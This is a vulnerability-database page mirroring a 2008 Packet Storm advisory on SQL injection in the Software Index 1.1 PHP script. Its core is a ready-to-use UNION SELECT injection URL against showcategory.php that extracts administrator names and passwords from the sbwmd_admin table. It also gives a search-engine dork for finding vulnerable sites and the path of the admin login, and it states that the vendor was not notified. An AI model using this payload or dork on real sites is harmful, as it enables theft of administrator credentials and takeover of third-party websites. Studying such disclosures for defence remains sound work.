Lucene search

softwareindex-sql.txt

🗓️ 08 Apr 2008 00:00:00Reported by t0pp8uzzType

packetstorm🔗 packetstormsecurity.com👁 18 Views

Software Index 1.1 SQL Injection Vulnerabilit

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`--==+================================================================================+==--  
--==+ Software Index 1.1 SQL Injection Vulnerbilitys +==--  
--==+================================================================================+==--  
  
  
  
Discovered By: t0pP8uZz & xprog  
Discovered On: 6 April 2008  
  
Script Download: http://www.turnkeyzone.com  
  
DORK: inurl:"add_soft.php"  
  
Vendor Has Not Been Notified!  
  
  
  
DESCRIPTION:   
Software Index 1.1 is vulnerable due to multiple insecure mysql querys.  
  
  
  
SQL Injection:  
http://site.com/showcategory.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(0x3C666F6E7420636F6C6F723D22726564223E,admin_name,0x3a,pwd,0x3C2F666F6E743E),3,4,5/**/FROM/**/sbwmd_admin/*  
  
  
  
NOTE/TIP:   
admin login is at /siteadmin/  
  
  
  
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !  
  
  
  
--==+================================================================================+==--  
--==+ Software Index 1.1 SQL Injection Vulnerbilitys +==--  
--==+================================================================================+==--  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

08 Apr 2008 00:00Current

7.4High risk

Vulners AI Score7.4